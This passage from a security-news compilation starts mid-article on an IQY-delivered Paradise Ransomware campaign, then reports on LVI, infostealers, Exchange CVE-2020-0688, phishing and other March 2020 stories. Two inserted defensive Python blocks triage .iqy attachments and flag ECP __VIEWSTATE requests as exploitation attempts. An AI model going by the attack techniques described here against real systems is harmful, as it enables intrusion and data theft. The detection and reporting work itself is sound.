Paradise Ransomware IQY file
This remote URL, though, contains an Excel formula that launches a PowerShell command on the victim's computer that downloads and runs an executable called key.exe.

Commands to execute
As you can guess, the key.exe executable is the Paradise Ransomware and once executed will encrypt the files on the computer and drop a ransom note named ---==%$$$OPEN_ME_UP$$$==---.txt.

This ransom note, shown below, will contain a link that can be used to get the ransom demand and payment instructions.

Paradise Ransomware ransom note
IQY attachments have been seen in other malware distribution campaigns in the past, such as Necurs, the Buran Ransomware, and the FlawedAmmyy remote access trojan, but they are not commonly seen.

They can also be extremely effective, as the attachments are simply text files with no malicious code in them. This can make them harder to detect by security software.

"This campaign exhibited how weaponized IQYs can be an effective technique for an attacker to infiltrate a network. Since these IQYs contain no payload (just a URL), they can be challenging for organizations to detect. Organizations may have to rely on a 3rd party URL reputation service if they do not have appliances in place to analyze and interrogate these URLs," LastLine explained in their report.

Unless you specifically use IQY files in your organization or at home, it is suggested that you block them using security software or delete any emails that utilize them as attachments.

IQY attachments delivered by email from unknown people will almost always be malicious and should simply be deleted.
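Because an IQY file is only a few lines of text, the blocking policy recommended above can be enforced at the mail gateway without any sandboxing. The following Python is an added example, not code from the article or from Lastline's report: it parses an .iqy attachment (the WEB marker, the query version line, the data-source URL, and any trailing Key=Value options), decides whether the data source is remote, and holds any file whose host is not on an allow list of web queries the organisation actually uses. The sample attachments, the example.invalid host and the corp.example host are constructed.

```python
from dataclasses import dataclass, field
from typing import Iterable, List
from urllib.parse import urlsplit

# Added example: triage Excel Web Query (.iqy) attachments at a mail gateway.
# Not code from the article or from Lastline; the sample files are constructed.

REMOTE_SCHEMES = {"http", "https", "ftp"}


@dataclass
class IqyVerdict:
    is_iqy: bool
    source: str = ""                                   # URL or path Excel would fetch
    remote: bool = False                               # fetched over the network
    options: List[str] = field(default_factory=list)   # trailing Key=Value lines
    reasons: List[str] = field(default_factory=list)


def parse_iqy(data: bytes) -> IqyVerdict:
    """Decode an .iqy file: line 1 is 'WEB', line 2 the query version ('1'),
    line 3 the data-source URL, and any remaining lines are Key=Value options
    such as Selection=AllTables."""
    text = data.decode("utf-8-sig", errors="replace")   # drops a UTF-8 BOM if present
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return IqyVerdict(is_iqy=False, reasons=["missing WEB marker or data source"])

    source = lines[2]
    verdict = IqyVerdict(is_iqy=True, source=source, options=lines[3:])
    scheme = urlsplit(source).scheme.lower()
    if scheme in REMOTE_SCHEMES:
        verdict.remote = True
        verdict.reasons.append(f"data source fetched over {scheme}")
    elif source.startswith("\\\\"):
        verdict.remote = True
        verdict.reasons.append("data source is a UNC share")
    else:
        verdict.reasons.append("data source is a local path")
    return verdict


def should_quarantine(data: bytes, allowed_hosts: Iterable[str] = ()) -> bool:
    """Gateway policy: hold any .iqy that pulls data from a host not on the
    allow list. With an empty allow list this is the article's advice of
    blocking IQY attachments outright."""
    verdict = parse_iqy(data)
    if not verdict.is_iqy or not verdict.remote:
        return False
    host = (urlsplit(verdict.source).hostname or "").lower()
    return host not in {h.lower() for h in allowed_hosts}


# Constructed samples (not the real Paradise attachment).
SAMPLE_MALICIOUS_IQY = b"WEB\r\n1\r\nhttp://example.invalid/key.dat\r\n"
SAMPLE_INTERNAL_IQY = (
    b"\xef\xbb\xbfWEB\r\n1\r\nhttps://reports.corp.example/sales.csv\r\n"
    b"Selection=AllTables\r\nFormatting=None\r\n"
)
SAMPLE_NOT_IQY = b"Dear customer, your order is attached.\r\n"

if __name__ == "__main__":
    for name, blob in (("malicious", SAMPLE_MALICIOUS_IQY), ("internal", SAMPLE_INTERNAL_IQY)):
        v = parse_iqy(blob)
        held = should_quarantine(blob, allowed_hosts=["reports.corp.example"])
        print(f"{name}: source={v.source} remote={v.remote} quarantine={held}")
```

Run the parser on every attachment whose name ends in .iqy regardless of its declared MIME type, since the file is plain text and a content-type check alone will not catch it.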


New LVI Intel CPU Data Theft Vulnerability Requires Hardware Fix
14.3.2020 
Bleepingcomputer  Vulnerability

A novel class of attack techniques against modern Intel processors can allow threat actors to inject malicious data into applications via transient-execution attacks and steal sensitive data according to researchers.

The vulnerability dubbed LVI (short for Load Value Injection) and tracked as CVE-2020-0551 was discovered and reported to Intel on April 4, 2019, by researchers at the Worcester Polytechnic Institute, imec-DistriNet/KU Leuven, Graz University of Technology, University of Michigan, University of Adelaide and Data61, in no particular order.

Bitdefender researchers also independently discovered one variant of attack in the LVI class (LVI-LFB) and reported it to Intel in February 2020.

LVI attacks let attackers change the normal execution of programs to steal data that is normally meant to be kept private within SGX enclaves. Sensitive information that can be stolen this way includes passwords, private keys of certificates, and more.

Even though the Intel Software Guard eXtensions (SGX) feature in modern Intel processors that enables apps to run within secure and isolated enclaves is not necessary to launch an LVI attack, its presence makes the attack a lot easier.

"While LVI attacks in non-SGX environments are generally much harder to mount, we consider none of the adversarial conditions for LVI to be unique to Intel SGX," the researchers explain.

New Spectre-type data injection vulnerability
"LVI turns previous data extraction attacks around, like Meltdown, Foreshadow, ZombieLoad, RIDL and Fallout, and defeats all existing mitigations," the researchers explain.

"Instead of directly leaking data from the victim to the attacker, we proceed in the opposite direction: we smuggle — 'inject' — the attacker's data through hidden processor buffers into a victim program and hijack transient execution to acquire sensitive information, such as the victim’s fingerprints or passwords."

In short, LVI attacks allow injecting arbitrary data (much like Spectre attacks) within the memory loaded by a targeted application under certain conditions, making it possible for an attacker to hijack the control and data flow until the app rolls back all operations after detecting the mistake.

The new vulnerability bypasses all transient-execution attack mitigations developed for Intel's processors so far, including those against Meltdown, Spectre, Foreshadow, ZombieLoad, RIDL, and Fallout.

To exploit LVI, attackers would have to go through the following four steps:

Poison a hidden processor buffer with attacker values.
Induce a faulting or assisted load in the victim program.
The attacker's value is transiently injected into code gadgets following the faulting load in the victim program.
Side channels may leave secret-dependent traces before the processor detects the mistake and rolls back all operations.
Also, LVI is a lot harder to mitigate than previous Meltdown-type attacks because it needs expensive software patches that could potentially make Intel SGX enclave computations between two and 19 times slower.

How LVI works
Modern Intel processors affected, mitigations available
LVI affects Intel Core-family processors from Skylake onwards with SGX support; a list of all affected CPUs is provided by Intel here.

Icelake Core-family processors aren't affected by LVI, while Meltdown-resistant processors are "only potentially vulnerable to LVI-zero-data (aka loads exhibiting zero injection behavior only)."

Short-term mitigations for LVI have to be implemented in software to protect already deployed systems from attacks targeting this flaw.

"LVI necessitates compiler patches to insert explicit lfence speculation barriers which serialize the processor pipeline after potentially every vulnerable load instruction," the researchers say.

"Additionally and even worse, due to implicit loads, certain instructions have to be blacklisted, including the ubiquitous x86 ret instruction."

Even though software workarounds can be implemented, the root cause behind LVI cannot be fixed with software changes which means that new CPUs from affected processor families will need to come with hardware fixes.

Known side-channel and transient-execution attacks attack plane comparison
"This is not a trivial attack to execute against a target, as several prerequisites have to be met," Bitdefender director of threat research Bogdan Botezatu told BleepingComputer. "This is not an average, run-of-the-mill malware attack that one would use against home users for instance."

"This is something that a determined threat actor, such as a hostile government-sponsored entity or a corporate espionage group would use against a high-profile target to leak mission-critical data from a vulnerable infrastructure.

"Although difficult to orchestrate, this type of attack would be impossible to detect and block by existing security solutions or other intrusion detection systems and would leave no forensic evidence behind."

Researchers have identified a new mechanism referred to as Load Value Injection (LVI). Due to the numerous complex requirements that must be satisfied to successfully carry out, Intel does not believe LVI is a practical method in real world environments where the OS and VMM are trusted. New mitigation guidance and tools for LVI are available now and work in conjunction with previously released mitigations to substantively reduce the overall attack surface. We thank the researchers who worked with us, and our industry partners for their contributions on the coordinated disclosure of this issue. - Intel

An academic research paper including more technical information regarding LVI is available here in PDF format and it will be presented in May 2020 at the 41st IEEE Symposium on Security and Privacy (IEEE S&P'20).

Proof of concept code detailing LVI attack applications is available on GitHub and Intel has also published a white paper here.

A video presenting demos of two LVI (Load Value Injection) proof of concept attacks is embedded below.

Update: Added Intel's statement.


Malware Unfazed by Google Chrome's New Password, Cookie Encryption
14.3.2020 
Bleepingcomputer  Virus

Google's addition of the AES-256 algorithm to encrypt cookies and passwords in the Chrome browser had a minor impact on infostealers.

Faced with the threat of having their business disrupted, developers of malware that steals data from web browsers quickly updated their tools to overcome the hurdle, many of their offers highlighting support for the new Chrome.

Even AZORult, abandoned by its original author in 2018, has received code updates from actors who continued the project to make it compatible with Chrome 80.

New infostealing software trying to earn its stripes on cybercriminal forums also jumped at the opportunity, being advertised with out-of-the-box support for the new encryption layer added to Google Chrome.

Before Chrome 80
Google rolled out Chrome 80 in early February and, until its release, cookies and passwords on Windows were encrypted using the DPAPI built into the operating system.

Raveed Laeb, product manager at cyber intelligence company KELA, told BleepingComputer that Chrome still relies on the old method but added a new layer on top of it.

The data is now first encrypted with AES-256, and the AES key is then itself encrypted using the CryptProtectData DPAPI function. Reversing the process to obtain the AES-256 key is done with the CryptUnprotectData function.

Replying to BleepingComputer, Google explained the reason for making this change, which affected infostealers for a short while:

"With M80, we made changes that will allow us to isolate Chrome’s network stack into its own robustly sandboxed process. As part of those changes we changed the algorithm for encrypted passwords/cookies and changed the storage mechanisms, which also disrupted the tooling that data thieves currently rely on."

Minor setback for malware
While Chrome adding AES encryption for cookies and passwords created ripples in the malware world, the disturbance was short-lasting for most malicious tools.

Soon after the new Chrome emerged, updates were publicly announced for at least four infostealers that had adapted to the new mechanism and had no trouble collecting the protected information.

The author of KPot infostealer posted four days after the new Chrome emerged that they had figured out the algorithm and would implement the fix in the tool.

In a subsequent post on the same day, they announced that an updated version was available for $90.


The authors of Raccoon, an infostealer that can grab data from nearly 60 apps - including all popular web browsers - announced that they, too, managed to bypass the new security layer in Chrome 80.

An update to their tool clearly specifies support for the latest version of the browser from Google and that the new features would become available with the new Raccoon build.

The release of the update would not affect the old builds, though, which would continue to work as originally designed.


Developers introducing new tools in the game seized the chance to grab some attention by promoting support for Chrome 80. Sleuthing from KELA uncovered an ad on a Russian cybercrime forum for Redline, a newcomer on the scene of infostealers.

"It's important to note that Redline is very new - offered for sale only after the new Chrome update, and hence doesn't have a lot of reputation," Laeb told BleepingComputer.

It is likely that the authors were using the Chrome update as a selling point since it was introduced with support for the new browser version.


AZORult is not dead, just in limbo
One of the top 10 active malware strains in 2019, AZORult also followed suit.

Left unattended by its original author in December 2018, the AZORult project was picked up by various authors and continues to be active to this day.

Genesis, an underground shop for browser data, kept using the original version of the malware and suffered grave losses when Chrome 80 came along, as uncovered by KELA researchers towards the end of February.

Genesis administrators are believed to run a malware-as-a-service business, distributing the original version of AZORult and selling the collected data through their market.

"It's a business model that we see expanding constantly for the past two years or so, as it allows them to be very scalable and peddle hundreds of thousands of infections." - Raveed Laeb, product manager at KELA

Many believed AZORult's final day had come and rushed to write its obituary, explaining in it the change Google added to Chrome.


Version 3.3.1 should have been the last we saw of AZORult. But some threat actors had a different plan and kept the malware alive through multiple offshoots.

These did not come from vetted developers, though, and gained little traction. Cybercriminals were wary of using them for fear that they had been tampered with.

AZORult++ was first reported in May 2019, and the announcement of the malware's version 3.4 was spotted recently.


Several variants of this infostealer exist, and one of them, updated not long ago, boasts compatibility with Chrome 80.

This version was announced at the beginning of March. Being from an unvetted source, this version is not largely adopted, despite AZORult's notoriety, but could be used in smaller campaigns.



Chrome 80 did stir the waters of infostealers but most of them discovered how to work with the added encryption layer fairly quickly. Activity from this type of malware is unlikely to subside any time soon.

In fact, a new campaign delivering Raccoon via a new variant of the sextortion scam was reported today by security researchers from IBM X-Force Threat Intelligence.


Google Play Protect Miserably Fails Android Protection Tests
14.3.2020 
Bleepingcomputer  Android

Google's Play Protect Android mobile threat protection system failed German antivirus testing lab AV-Test real-world tests, scoring zero out of a maximum of six points after very weak malware detection performance.

The Google Play Protect built-in malware protection for Android was introduced three years ago, during the Google I/O 2017 in May 2017, with Google starting full deployment to all Android devices during July 2017.

Today, Google's Play Protect is deployed on over 2.5 billion active Android devices as shown by the Android security center.

Android security app final rankings (AV-Test)
Anything else but Google Play Protect
According to AV-Test's results, Google Play Protect was able to detect a little over one-third of the roughly 6,700 malware samples the testing lab used throughout the tests which means that more than 4,000 of them were able to infect the test devices.

Google Play Protect detected 37% of 3,300 newly discovered samples — not more than 2 to 24 hours old — in the real-time testing phase, and 33.1% in the reference set test that used 3,300 malware samples that have been circulating for up to 4 weeks.

As can be seen in the below screenshot, both results are the last in the rankings, with all other mobile antivirus security solutions having detection rates above 98% in both protection tests.

Google Play Protect also had issues with false alarms as it mistakenly tagged about 30 harmless applications as being a threat to the test devices.

Android malware detection rates (AV-Test)
Actually, out of all mobile security suites, Antiy, Bitdefender, Cheetah Mobile, NortonLifeLock, Trend Micro, and Kaspersky hit a perfect 100% detection rate.

"With Play Protect, Google promises protection against infected programs," AV-Test says. "That's why the tool runs automatically on every newer Android system, scanning available apps."

"The current test indicates, however, that Android users should not rely solely on Play Protect," the testing lab adds.

"As the detection rates of Google Play Protect are really quite poor, the use of a good security app is highly recommended."

AV-Test's comparison only evaluated Android security apps for consumers, with the lab to test enterprise security apps and release the results in April 2020.

This is not the first time Android's built-in security app has failed AV-Test's examination: Google Play Protect was also at the bottom of the protection rankings, far behind the other mobile security tools, in October 2017, right after its release.

100 billion apps scanned every day
According to Google, Play Protect scans over 100 billion apps for malware each day, up 50 billion when compared to 2018 and it provides Android users with information regarding potential security issues and the actions needed to keep their devices secure.

Last year, Google joined efforts with ESET, Lookout, and Zimperium through the App Defense Alliance to improve malicious Android app detection on submission and block such apps before getting published on the Play Store.

The App Defense Alliance couldn't have come sooner, seeing that malware has managed to infiltrate Google's app ecosystem quite often despite the company's efforts to stop it. (1, 2, 3)

Google also enhanced the machine-learning detection systems used by Google Play Protect to analyze Android app code, metadata, and user engagement signals for suspicious content and behavior.

BleepingComputer has reached out to Google for comment but had not heard back at the time of this publication.


Intricate Phishing Scam Uses Support Chatbot to ‘Assist’ Victims
14.3.2020 
Bleepingcomputer  Phishing

An intricate phishing scam is utilizing a "customer service" chatbot that walks its victims through filling out the various forms so that the attackers can steal their information, credit card numbers, and bank account information.

A new phishing scam that was recently found by MalwareHunterTeam is targeting Russian victims and pretending to be a refund of 159,700 ($2,100) for unused Internet and cellular services.

What makes the phishing scam so interesting is that it utilizes a chat bot that pretends to be a customer service agent to walk the victim through a series of screens and the information that they need to provide.

"Support Representative" guiding you through a phishing scam
After submitting requested information such as the victim's name, address, last four digits of passport number, and payment details, the fake support rep tells the victim that something strange has happened as their information cannot be found in the system.

It then asks the victim to resubmit the information.

Working on a double-verify on the entered information
This acts as a double-verify by the scammers to make sure that the victim is submitting the correct information. Even if you submit different information the second time, the chatbot will come back on and say your record was found.

Victim's info has been found and they can proceed
It then redirects the victim to another phishing site under the attacker's control, where they are asked to provide their name, phone number, and credit card info.

Steal victim's credit card information
The credit card information that is entered will be verified using a variety of different methods depending on what was entered. This allows the attackers to capture accurate credit card info from the victim.

At the end of the scam, the attackers have a victim's email address, phone number, name, credit card info, and the last four digits of their passport number.

This is enough to perform identity theft, gain access to accounts via customer support numbers, and other malicious activity.

As always, never submit information on any site without first confirming that you are at the correct URL for the service being offered.

Furthermore, if you are being offered a refund for any service, contact that service directly to confirm it is not a scam before filling out any related information.


NSA Warns About Microsoft Exchange Flaw as Attacks Start
14.3.2020 
Bleepingcomputer  BigBrothers

The U.S. National Security Agency (NSA) warned about a post-auth remote code execution vulnerability in all supported Microsoft Exchange Server servers via a tweet published on the agency's Twitter account.

NSA's tweet reminded followers to patch the CVE-2020-0688 vulnerability which would enable potential attackers to execute commands on vulnerable Microsoft Exchange servers using email credentials.

Microsoft patched this RCE security flaw as part of the February 2020 Patch Tuesday and tagged it with an "Exploitation More Likely" exploitability index assessment hinting at CVE-2020-0688 being an attractive target for attackers.

State-backed hackers already attacking Microsoft Exchange servers
The same day, researchers at security firm Volexity confirmed that exploitation of this security flaw began in late February, with several organizations already having had their networks compromised after state-backed advanced persistent threat (APT) groups exploited the CVE-2020-0688 flaw.

"Volexity has also observed multiple concerted efforts by APT groups to brute-force credentials by leveraging Exchange Web Services (EWS) in an effort to likely exploit this vulnerability," their report says.

"Volexity believes these efforts to be sourced from known APT groups due to IP address overlap from other attacks and, in some cases, due to the targeting of credentials that would only be known from a previous breach."

Volexity (@Volexity), Mar 7, 2020: "Active exploitation of Microsoft Exchange servers by APT actors via the ECP vulnerability CVE-2020-0688. Learn more about the attacks and how to protect your organization here: https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/ #dfir #threatintel #infosec"

A U.S. Department of Defense (DoD) source also confirmed the ongoing attacks to ZDNet, although, just like Volexity, it didn't name the groups or the countries behind them.

As BleepingComputer previously reported, scans for unpatched Microsoft Exchange servers started on February 25, the same day Zero Day Initiative security researcher Simon Zuckerbraun published a report on CVE-2020-0688.

After his report, a new module targeting this flaw was added by Rapid7 to the Metasploit pen-testing tool following multiple proof-of-concept exploits having surfaced on GitHub.

Sigma rules for SIEM systems provided by Nextron Systems's Florian Roth are available for detecting exploitation attempts against unpatched Exchange servers.

Microsoft Exchange Server RCE vulnerability
As Zuckerbraun explained, "any outside attacker who compromised the device or credentials of any enterprise user would be able to proceed to take over the Exchange server."

"Having accomplished this, an attacker would be positioned to divulge or falsify corporate email communications at will," he added. "Accordingly, if you’re an Exchange Server administrator, you should treat this as a Critical-rated patch and deploy it as soon as your testing is complete."

The actively exploited vulnerability was found in the Exchange Control Panel (ECP) component and it is caused by Exchange's failure to create unique cryptographic keys when installed.

Once successfully exploited, it allows authenticated attackers to execute code remotely with SYSTEM privileges and fully compromise the exploited server.

Links to the security update descriptions for vulnerable Microsoft Exchange Server versions and download links are available in the table below:

Product | Article | Download
--- | --- | ---
Microsoft Exchange Server 2010 Service Pack 3 Update Rollup 30 | 4536989 | Security Update
Microsoft Exchange Server 2013 Cumulative Update 23 | 4536988 | Security Update
Microsoft Exchange Server 2016 Cumulative Update 14 | 4536987 | Security Update
Microsoft Exchange Server 2016 Cumulative Update 15 | 4536987 | Security Update
Microsoft Exchange Server 2019 Cumulative Update 3 | 4536987 | Security Update
Microsoft Exchange Server 2019 Cumulative Update 4 | 4536987 | Security Update

"Fortunately, this vulnerability does require a compromised credential to exploit and, as a result, will stave off widespread automated exploitation such as those that often deploy cryptocurrency miners or ransomware," Volexity said.

"However, more motivated attackers now have a way to compromise a critical piece of the IT infrastructure if it is not updated."

Since no mitigating factors have been identified for this vulnerability according to Microsoft, the only choice left is to patch your servers — if you're not willing to reset all users' passwords to render all previously stolen credentials useless — before hackers will get to them and manage to fully compromise your entire network.
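The article mentions that Sigma rules exist for spotting exploitation attempts in IIS logs, but does not reproduce them. The following is an added example of the kind of log-based check an Exchange administrator could run; it is not code from the article, from Volexity, or Florian Roth's Sigma rule. It assumes, based on the ECP component being the vulnerable endpoint, that an exploitation attempt appears in the IIS W3C log as a request to a path under /ecp/ whose query string carries a __VIEWSTATE parameter (legitimate ECP pages submit ViewState in a POST body, not in the URL). The log lines, user names, IP addresses and the generator value are all constructed for illustration.

```python
"""Heuristic detector for CVE-2020-0688 exploitation attempts in IIS W3C logs.

Added example: not the article's, Volexity's or Nextron Systems' code, and not
the Sigma rule the article refers to. The sample log is constructed.
Assumption: a request to an /ecp/ page with __VIEWSTATE in the query string is
anomalous, because ECP normally carries ViewState in a POST body.
"""
from dataclasses import dataclass
from urllib.parse import parse_qs

# Constructed sample of an IIS W3C log: directive lines plus five records.
# IPs are from documentation ranges; the generator value is a placeholder.
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip sc-status
2020-03-06 10:01:02 10.0.0.5 GET /owa/ - 443 CONTOSO\\alice 203.0.113.10 200
2020-03-06 10:01:09 10.0.0.5 POST /ecp/default.aspx - 443 CONTOSO\\alice 203.0.113.10 200
2020-03-06 10:02:31 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=XXXXXXXX&__VIEWSTATE=AAAA 443 CONTOSO\\bob 198.51.100.7 500
2020-03-06 10:02:40 10.0.0.5 GET /ecp/default.aspx __VIEWSTATEGENERATOR=XXXXXXXX&__VIEWSTATE=BBBB 443 CONTOSO\\bob 198.51.100.7 500
2020-03-06 10:03:00 10.0.0.5 GET /ecp/Settings.aspx - 443 CONTOSO\\carol 203.0.113.11 200
"""


@dataclass(frozen=True)
class Hit:
    time: str
    client_ip: str
    user: str
    stem: str
    status: int


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields directive."""
    fields = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # other directives (#Software, #Date, ...)
        if fields is None:
            raise ValueError("record encountered before a #Fields directive")
        values = line.split()
        if len(values) != len(fields):
            continue  # skip a malformed record rather than abort the scan
        yield dict(zip(fields, values))


def is_suspicious(rec):
    """True when an /ecp/ request carries ViewState in its query string."""
    stem = rec.get("cs-uri-stem", "").lower()
    if "/ecp/" not in stem:
        return False
    query = rec.get("cs-uri-query", "-")
    if query == "-":
        return False  # IIS logs '-' for an empty query string
    keys = {k.lower() for k in parse_qs(query, keep_blank_values=True)}
    return "__viewstate" in keys


def find_cve_2020_0688_attempts(log_text):
    """Return the records that match the heuristic, as Hit objects."""
    hits = []
    for rec in parse_w3c(log_text):
        if is_suspicious(rec):
            hits.append(Hit(
                time=f"{rec['date']} {rec['time']}",
                client_ip=rec["c-ip"],
                user=rec["cs-username"],
                stem=rec["cs-uri-stem"],
                status=int(rec["sc-status"]),
            ))
    return hits


def summarize(hits):
    """Count hits per (client IP, account) to surface repeated attempts."""
    counts = {}
    for h in hits:
        key = (h.client_ip, h.user)
        counts[key] = counts.get(key, 0) + 1
    return counts


if __name__ == "__main__":
    found = find_cve_2020_0688_attempts(SAMPLE_LOG)
    for h in found:
        print(h)
    print(summarize(found))
```

On the constructed log the two GET requests from the same client and account are flagged while the ordinary POST to the same page is not. The check deliberately does not key on the 500 status code, so an attempt that happens to succeed is still reported; pairing the hits with the cs-username field tells you which credential the attacker already holds and therefore which account to reset.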


Malware Spread as Nude Extortion Pics of Friend's Girlfriend
14.3.2020 
Bleepingcomputer  Spam  Virus

Attackers have recently warped sextortion scams into baits used to infect their targets with Raccoon information stealer malware designed to help steal credentials, credit card information, desktop cryptocurrency wallets, and more.

Emails using this new method of luring targets into infecting themselves with Raccoon payloads are distributed in parallel with a more conventional DocuSign campaign.

The same series of attacks was previously used by the attackers to distribute the Predator The Thief info stealer via Uber, UPS, QuickBooks, and Secure Parking themed spam.

Sextortion campaign failure used as a lure
As IBM X-Force Threat Intelligence researchers discovered, the attackers are now luring victims using emails promising to give access to the nude extortion pics of a friend's girlfriend.

These emails have a variety of subjects, such as "Mail belonging to your colleague has been stolen," "Private info belonging to your friend has been stolen", "Your colleague’s account was compromised," or "We have got access to your friend’s account."

In the emails, the attackers, who claim to be the "Red Skull hacker crew", say that they have access to a friend's email account where they found "images of this naked girlfriend and demanded five hundred dollars for them."

"In the event that he will ignore us, we guaranteed him that we will send these photos to everyone of his contacts," the messages add. "Regrettably, he has not paid, and because you were on his contact list, you obtained this mail. You will find these pix attached to this message."

Phishing email sample (IBM X-Force)
By playing the failed sextortion scam card, the campaign's operators attempt to tempt their potential victims to open a malicious attachment with a blurred image that requires them to enable content to be viewed.

Of course, after doing that, the malware payload will be deployed on their computers via embedded macros that run a PowerShell command which downloads and installs the Raccoon info stealer.

At the moment, the domain used to deliver the info stealer payloads has been taken down according to IBM X-Force Threat Intelligence researchers, although the campaign's operators might soon switch to another one to keep the attacks going.

By promising to deliver photos of a friend's naked girlfriend, the scammers appeal to the curiosity of their targets which, in many cases, might be a more successful method of incentivizing them to open a malicious attachment than making threats.

Sextortion malicious attachment
The Raccoon info stealer
Raccoon (aka Legion, Mohazo, and Racealer) is information-stealing malware distributed under the MaaS (malware-as-a-service) model for $75/week or $200/month.

The info stealer is delivered via exploit kits, phishing, and PUA (potentially unwanted applications), and it was first spotted almost a year ago on cybercriminal forums being advertised as malware capable of stealing a wide range of data including but not limited to email credentials, credit card info, cryptocurrency wallets, browser data, and system information.

A report from CyberArk says that Raccoon is capable of digging its way into about 60 different applications, from browsers and cryptocurrency wallets to email and FTP clients, to steal sensitive information and deliver it to its operators.

Stolen data prepared for exfiltration (CyberArk)
Raccoon can also be configured to take snapshots of the compromised devices' screens, as well as drop secondary payloads as part of multi-stage attacks.

Recorded Future and Cybereason Nocturnus both said that Raccoon was one of the best-selling malware during 2019 and that it was used to infect hundreds of thousands of systems even though it lacks both sophistication and innovative features.


Folding@Home Wants Your CPU Cycles for Coronavirus Research
14.3.2020 
Bleepingcomputer  IT

The Folding@home distributed computing project is now utilizing donated CPU cycles to research the Coronavirus (COVID-19) virus.

Folding@home is a project founded by Pande Lab at Stanford University where users donate CPU cycles through a software client to simulate protein folding, computational drug design, and other types of molecular dynamics to learn more about diseases and how to protect against them.

At the end of February, the Folding@home project announced that they are joining other COVID-19 researchers around the world to learn more about the virus and create potential drug therapies.

"By downloading Folding@Home, you can donate your unused computational resources to the Folding@home Consortium, where researchers working to advance our understanding of the structures of potential drug targets for 2019-nCoV that could aid in the design of new therapies. The data you help us generate will be quickly and openly disseminated as part of an open science collaboration of multiple laboratories around the world, giving researchers new tools that may unlock new opportunities for developing lifesaving drugs," the Folding@home project stated in a blog post.

If you have a computer lying around not doing anything after the SETI@home project stopped sending work, or want to donate your active computer's idle CPU processing power to researching the COVID-19 virus, you can do so by downloading and installing the Folding@home client.

Once installed, right-click on the Folding@home icon in your Windows system tray to configure how much CPU power you wish to donate. The intensity of your CPU utilization can be set to 'Full', 'Medium', or 'Light', with Light being the lightest CPU load.

Folding@home options
If you plan on using your computer while donating cycles, I recommend you select the 'Light' option.

If you want to control Folding@home using a web interface, you can select the 'Web Control' option as shown in the image above. This will open a web page showing your current work in progress, your settings, and the project your CPU cycles are contributing to.

Folding@Home
If you have configured the client to support research fighting 'Any Disease', then your CPU cycles will be randomly assigned among different projects, including Coronavirus/COVID-19 research.

You can determine what project you are contributing to by looking at the project number and looking it up here.

If you are contributing to projects 11741, 11742, or 11743 then your donated CPU cycles are being used for Coronavirus research.


Windows 10 PowerToys Excitement Builds as New Toys Announced
14.3.2020 
Bleepingcomputer  OS

There are a lot of reasons to resize a photo. You may want to set a different aspect ratio for all your photos and you may just want to cut out unnecessary parts of a photo and reduce its size and save your computer's disk space.

Back in the old days, Windows 95 shipped with PowerToys, which allowed users to resize multiple images. And the PowerToys' Image Resizer feature appears to be making a comeback on Windows 10 later this year.

In the release notes of PowerToys v15, which only contained bug fixes, Microsoft confirmed that the company is working on an Image Resizer toy. The details are not yet available, but the feature would be similar to Windows 95's Image Resizer.

In addition to Image Resizer, Microsoft is also working on PowerLauncher to let you search for and launch your apps instantly. Unlike Windows 10's built-in Search feature, PowerLauncher comes with a very simple user interface, and it also features an auto-complete search bar.

PowerLauncher

PowerLauncher is aimed to be faster than Windows Search for showing local search results and apps.

Another PowerToy is being developed to help users remap the keys on their keyboards and also rearrange the system shortcuts.

“For developers and some seasoned users, where using their keyboard is a large part of their job, ability to remap keystrokes and engage executables can lead to massive gains in time. In fact, this was the second most popular topic measured through thumbs up and the most commented issue in the PowerToys Github,” Microsoft said.

Microsoft is planning to release these new PowerToys at some point in 2020.


Twitter First: Trump Video Retweet Tagged as 'Manipulated Media'
14.3.2020 
Bleepingcomputer  Social
For the first time, Twitter has labeled a video as 'Manipulated Media' that attempts to portray Joe Biden as stating that Donald Trump should be re-elected.

In a video tweeted by White House social media director Dan Scavino, it looks as if Joe Biden is saying that "We can only re-elect Donald Trump."

In reality, though, this video has been deceptively cut short to fit this message when in fact Biden stated "We can only re-elect Donald Trump if in fact we get engaged in this circular firing squad here. It's got to be a positive campaign, so join us."

Dan Scavino (@DanScavino), Mar 8, 2020: "Sleepy Joe💤in St. Louis, Missouri today: “We can only re-elect @realDonaldTrump.” #KAG2020LandslideVictory🇺🇸" [embedded video]

Josh Jordan (@NumbersMuncher), Mar 8, 2020: "The full video is just a little different. You'd think snowflakes who whine about fake news would be more careful before spreading... fake news." [embedded video]

After this video started heavily circulating on social networks and amassing over 6 million views on Twitter, Washington Post's Cat Zakrzewski noticed that for the first time Twitter applied its 'Manipulated Media' label to the video.

Twitter Manipulated Media
This 'Manipulated Media' label is part of Twitter's new guidelines and approach to synthetic and manipulated media being shared on the social network. Twitter has told BleepingComputer that these guidelines went into effect on March 5th, 2020.

Tweets that share synthetic and manipulated media are subject to removal under this policy if they are likely to cause harm. Some specific harms we consider include:

- Threats to the physical safety of a person or group
- Risk of mass violence or widespread civil unrest
- Threats to the privacy or ability of a person or group to freely express themselves or participate in civic events, such as: stalking or unwanted and obsessive attention; targeted content that includes tropes, epithets, or material that aims to silence someone; voter suppression or intimidation

Under these guidelines, if a shared media is significantly and deceptively altered or fabricated, they will use the following checklist to determine if it should be labeled as 'Manipulated Media' or removed outright.

Handling deceptive media on Twitter
Twitter is not the only one labeling this video as deceptive, as Zakrzewski later found that Facebook has now also labeled the video on their platform as "Partly False Information".

Facebook marking video as 'Partly False Information'
According to Twitter, due to a technical issue, the 'Manipulated Media' label is only being displayed when the tweet is shown in a timeline, and they are working on a fix for this issue.


Ryuk Ransomware Behind Durham, North Carolina Cyberattack
14.3.2020 
Bleepingcomputer  Ransomware

The City of Durham, North Carolina has shut down its network after suffering a cyberattack by the Ryuk Ransomware this weekend.

Local media reports that the city fell victim to a phishing attack that ultimately led to the deployment of the Ryuk Ransomware on their systems.

"According to the SBI, the ransomware, named Ryuk, was started by a Russian hacker group and finds its way into a network once someone opens a malicious email attachment. Once it's inside, Ryuk can spread across network servers through file shares to individual computers," reported.

